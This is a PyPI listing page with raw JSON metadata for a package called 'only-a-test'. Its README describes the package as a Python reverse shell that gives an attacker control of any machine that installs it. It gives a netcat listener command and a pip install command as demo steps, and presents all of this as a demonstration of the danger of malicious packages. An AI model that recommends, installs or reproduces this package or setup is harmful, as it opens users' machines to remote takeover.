only-a-test


Nameonly-a-test JSON
Version 0.1.2 PyPI version JSON
download
home_pagehttps://github.com/The-Robin-Hood/pip-remote-access
SummaryTo Show the vulnerability of the system
upload_time2023-04-09 03:02:10
maintainer
docs_urlNone
authorThe-Robin-Hood (Ansari)
requires_python
license
keywords python vulnerability remoteaccess sockets
VCS
bugtrack_url
requirements No requirements were recorded.
Travis-CI No Travis.
coveralls test coverage No coveralls.
            # Explanation:

This is Simple Python Reverse Shell module.
It is show how one can write a exploit and upload a malicious code to pyorg.
If installed how the attacker can get over your machine.

1. First Listen on 1234 port with netcat
`nc -lvp 1234`

2. Install the package 
`pip install pip-remote-access`

#### Demo :
<a href=https://youtu.be/NOoJItXU9ps>
<img src="https://media4.giphy.com/media/GlXNuhLEjIUTAfIVpC/giphy.gif?cid=ecf05e47v0qmxkcev5dyurr35agj868z9j9nt3oglw2ed0k3&rid=giphy.gif&ct=s" width="100" height="50"/>
</a>

            

Raw data

            {
    "_id": null,
    "home_page": "https://github.com/The-Robin-Hood/pip-remote-access",
    "name": "only-a-test",
    "maintainer": "",
    "docs_url": null,
    "requires_python": "",
    "maintainer_email": "",
    "keywords": "python,vulnerability,remoteaccess,sockets",
    "author": "The-Robin-Hood (Ansari)",
    "author_email": "",
    "download_url": "https://files.pythonhosted.org/packages/62/14/897e277b0ce594b5e30517db1e3c6f2366db30bb48e8037b00f9a7f11407/only_a_test-0.1.2.tar.gz",
    "platform": null,
    "description": "# Explanation:\n\nThis is Simple Python Reverse Shell module.\nIt is show how one can write a exploit and upload a malicious code to pyorg.\nIf installed how the attacker can get over your machine.\n\n1. First Listen on 1234 port with netcat\n`nc -lvp 1234`\n\n2. Install the package \n`pip install pip-remote-access`\n\n#### Demo :\n<a href=https://youtu.be/NOoJItXU9ps>\n<img src=\"https://media4.giphy.com/media/GlXNuhLEjIUTAfIVpC/giphy.gif?cid=ecf05e47v0qmxkcev5dyurr35agj868z9j9nt3oglw2ed0k3&rid=giphy.gif&ct=s\" width=\"100\" height=\"50\"/>\n</a>\n",
    "bugtrack_url": null,
    "license": "",
    "summary": "To Show the vulnerability of the system",
    "version": "0.1.2",
    "split_keywords": [
        "python",
        "vulnerability",
        "remoteaccess",
        "sockets"
    ],
    "urls": [
        {
            "comment_text": "",
            "digests": {
                "blake2b_256": "6214897e277b0ce594b5e30517db1e3c6f2366db30bb48e8037b00f9a7f11407",
                "md5": "e9b15e66bdd8d70777809839d406758f",
                "sha256": "2ab7b0e398eb48b0f81c788489397ac177307aee882bc6fdaabba41e5a8a8644"
            },
            "downloads": -1,
            "filename": "only_a_test-0.1.2.tar.gz",
            "has_sig": false,
            "md5_digest": "e9b15e66bdd8d70777809839d406758f",
            "packagetype": "sdist",
            "python_version": "source",
            "requires_python": null,
            "size": 3520,
            "upload_time": "2023-04-09T03:02:10",
            "upload_time_iso_8601": "2023-04-09T03:02:10.285735Z",
            "url": "https://files.pythonhosted.org/packages/62/14/897e277b0ce594b5e30517db1e3c6f2366db30bb48e8037b00f9a7f11407/only_a_test-0.1.2.tar.gz",
            "yanked": false,
            "yanked_reason": null
        }
    ],
    "upload_time": "2023-04-09 03:02:10",
    "github": true,
    "gitlab": false,
    "bitbucket": false,
    "github_user": "The-Robin-Hood",
    "github_project": "pip-remote-access",
    "travis_ci": false,
    "coveralls": false,
    "github_actions": false,
    "lcname": "only-a-test"
}
        
Elapsed time: 0.07415s